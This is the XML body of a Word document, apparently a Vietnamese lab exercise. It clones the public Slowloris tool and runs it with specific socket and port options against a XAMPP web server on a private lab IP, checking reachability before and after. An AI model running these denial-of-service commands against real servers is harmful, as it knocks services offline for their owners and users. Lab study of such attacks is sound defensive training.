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6907" w14:textId="6E29DD09" w:rsidR="00345DF0" w:rsidRDefault="00154996">
      <w:r>
        <w:t>Slowloris</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5711883F" w14:textId="73FAB4FE" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r w:rsidRPr="00154996">
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00560300">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/gkbrk/slowloris.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68AC2D66" w14:textId="2E355D8E" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5061D68A" wp14:editId="3B7C64D7">
            <wp:extent cx="59436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D512" w14:textId="746BFFBF" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:t>cd slowloris</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3F33E7" w14:textId="751AA2B9" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:t>chmod 755 *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E17D62" w14:textId="17ED2B4D" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r w:rsidRPr="00154996">
        <w:t># python3 slowloris.py  192.168.74.213 -s 500</w:t>
      </w:r>
      <w:r w:rsidR="00196AFE">
        <w:t xml:space="preserve">                        -p 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E34DB" w14:textId="1E30332F" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AEC93DB" wp14:editId="36EC3168">
            <wp:extent cx="5098222" cy="123454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1BB" w14:textId="2D45E9FE" w:rsidR="00154996" w:rsidRDefault="00154996"/>
    <w:p w14:paraId="6E2E904F" w14:textId="33DBD194" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:t>Win 10 cài Xampp bản mới nhất</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7333CC41" w14:textId="22D4E8E8" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="370214F0" wp14:editId="57DF0BCF">
            <wp:extent cx="5943600" cy="331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C48D" w14:textId="1303F7C1" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:t>Truy cập thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A446A8D" w14:textId="080B156B" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D3CB3BD" wp14:editId="12D171E5">
            <wp:extent cx="5943600" cy="276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5854" w14:textId="4DD68383" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:t>Chạy lệnh Dos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39801BF2" w14:textId="30747A64" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r w:rsidRPr="00154996">
        <w:t># python3 slowloris.py  192.168.74.213 -s 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F882DB5" w14:textId="77186FDF" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B7CB72" wp14:editId="11B20FE5">
            <wp:extent cx="5075360" cy="1699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BA3D" w14:textId="55C2F978" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:t>Truy cập thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E94E08" w14:textId="34F8CBC7" w:rsidR="00154996" w:rsidRDefault="00154996">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47AE7180" wp14:editId="7DA4847F">
            <wp:extent cx="5943600" cy="3245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96"/>
    <w:rsid w:val="00154996"/>
    <w:rsid w:val="00196AFE"/>
    <w:rsid w:val="00345DF0"/>
    <w:rsid w:val="006A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0D35"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3D6708FF-2C17-4499-AE44-45A9DCDB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hyperlink" Target="https://github.com/gkbrk/slowloris.git" TargetMode="Externa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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Trinh Ngoc Hung</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-04T08:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-23T03:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>